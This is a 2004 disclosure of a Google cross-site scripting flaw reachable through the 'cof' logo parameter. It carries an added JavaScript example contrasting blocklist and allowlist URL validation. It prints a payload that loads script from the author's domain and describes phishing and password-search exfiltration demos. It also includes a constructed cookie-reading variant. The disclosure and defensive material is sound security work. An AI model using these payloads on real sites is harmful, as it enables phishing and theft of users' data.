Google Desktop Exploit

Simple Google Cross Site Scripting Exploit.
17th October 2004
Jim Ley, Jibbering.com

Google Fix

Google has now patched its servers; the last time I saw the exploit working was 5:51 GMT on 20th October 2004. The fix does not look complete to me: it still just special-cases the strings javascript and vbscript, so it is still possible to put things other than http URLs into the img (which seems to me the only logical thing to allow). That may leave remaining attack vectors, either through different script methods or by playing with charsets that bypass the filtering.

The Problem

For over two years Google has had a script insertion flaw. I reported it two years ago, and again a couple of months ago, but it still has not been fixed. Google Desktop has made the situation worse, because Google search results now include the content of local files. With this in mind I produced a couple of simple example exploits.

Credit Card Phishing example

You can replace the content of the Google page with your own content; here I replaced it with a simple credit card submission form suggesting that Google will shortly become a subscription service. Screenshot of it in use.

The desktop sniffer example

Visit Google with this link, and the result of the inserted Google Desktop search for password will be reported to my site.

The exploit might be easier to do with a custom form that submits the cof value to Google.

The exploit is simple: include a search parameter cof with the value

L:javascript:javascript:document.appendChild(document.createElement('script')).src='http://jibbering.com/test.js'

and the page will load the script from my domain. The problem is that Google fails to check that the image you reference to customise the look is an actual image URL and not script. This is a well known problem for web authors; there was a CERT advisory back in 2000 along with tips on how to mitigate it, which Google's developers seem to have missed.

That script can obviously do anything www.google.com has permission for. In the second example it creates a hidden IFRAME containing a regular Google search for password (or the search term you used, if you used one) and returns part of that page to a page on my site which stores the data. In the first example it replaces the page with a form requesting a credit card number to buy access to Google, with all the details forwarded to my site.
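To show the mechanism described above, and why the partial fix noted under Google Fix is weak, here is an added example in JavaScript (Node.js) that is not Google's code and not from the original page. It assumes the cof value is a semicolon-separated list of KEY:value pairs with L holding the logo URL (the page only shows the L: prefix), and every function name in it is made up for illustration. It renders the L value the vulnerable way, applies a blocklist of the two scheme names the page says Google still special-cases, and then the allowlist check a practitioner would actually want: parse the URL and accept only absolute http/https.

```javascript
// Added example (not Google's code, not from the original page): an
// unvalidated "logo URL" customisation parameter becoming script injection,
// why a blocklist of scheme names is a weak fix, and the allowlist to use
// instead. ASSUMPTIONS: the cof value is a semicolon-separated list of
// KEY:value pairs with L carrying the logo URL; all function names are made up.

// Parse "L:http://host/logo.gif;LW:100" into { L: 'http://host/logo.gif', LW: '100' }.
// Only the first ':' separates key from value, so a value that itself
// contains ':' (as every URL does) survives intact.
function parseCof(cof) {
  const fields = {};
  for (const part of cof.split(';')) {
    const i = part.indexOf(':');
    if (i > 0) fields[part.slice(0, i)] = part.slice(i + 1);
  }
  return fields;
}

// Minimal HTML attribute escaping. Escaping alone does not help here: the
// attacker never breaks out of the attribute, the browser simply evaluates
// whatever scheme the src attribute carries.
function escapeAttr(s) {
  return s.replace(/&/g, '&amp;').replace(/"/g, '&quot;')
          .replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

// Vulnerable rendering: the L value goes straight into <img src>.
function renderLogoVulnerable(cof) {
  const logo = parseCof(cof).L || '';
  return `<img src="${escapeAttr(logo)}">`;
}

// Blocklist in the spirit of the fix described above: refuse URLs that start
// with a script scheme. It catches the obvious payload but answers the wrong
// question ("does this look bad?") instead of "is this an http URL?".
function rejectedByBlocklist(url) {
  return /^\s*(javascript|vbscript):/i.test(url);
}

// Allowlist: parse the URL and accept only absolute http/https URLs.
// Anything unparseable, relative, or on another scheme is refused. The
// WHATWG parser also strips tabs and newlines from the scheme before
// comparing, so charset tricks are judged by what the browser would see.
function isHttpUrl(url) {
  try {
    const u = new URL(url);
    return u.protocol === 'http:' || u.protocol === 'https:';
  } catch {
    return false;
  }
}

// Hardened rendering: omit the logo rather than emit an untrusted src.
function renderLogoHardened(cof) {
  const logo = parseCof(cof).L || '';
  return isHttpUrl(logo) ? `<img src="${escapeAttr(logo)}">` : '';
}

// The payload from the page, plus a constructed variant with a tab inside the
// scheme name, the kind of charset trick the author warns about: a literal
// string match misses it, while Internet Explorer of that era ignored the
// tab and ran the script.
const PAGE_PAYLOAD =
  "L:javascript:javascript:document.appendChild(document.createElement('script')).src='http://jibbering.com/test.js'";
const TAB_PAYLOAD = "L:java\tscript:alert(document.cookie)";   // constructed
const GOOD_COF = 'L:http://www.google.com/logo.gif;LW:100';     // constructed

function demo() {
  return {
    vulnerable: renderLogoVulnerable(PAGE_PAYLOAD),
    blocklistCatchesPage: rejectedByBlocklist(parseCof(PAGE_PAYLOAD).L),
    blocklistCatchesTab: rejectedByBlocklist(parseCof(TAB_PAYLOAD).L),
    hardenedPage: renderLogoHardened(PAGE_PAYLOAD),
    hardenedTab: renderLogoHardened(TAB_PAYLOAD),
    hardenedGood: renderLogoHardened(GOOD_COF),
  };
}

if (typeof require !== 'undefined' && require.main === module) console.log(demo());
```

Run it with node: the blocklist refuses the page's payload but passes the tab-in-scheme variant, while the allowlist refuses both and keeps the ordinary http URL. Validating the scheme through a URL parser removes the need to enumerate dangerous strings or reason about charsets at all, since the question becomes what the browser's own parser will make of the value.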

Screenshot of the phishing exploit

Screenshot of Google showing inserted credit card form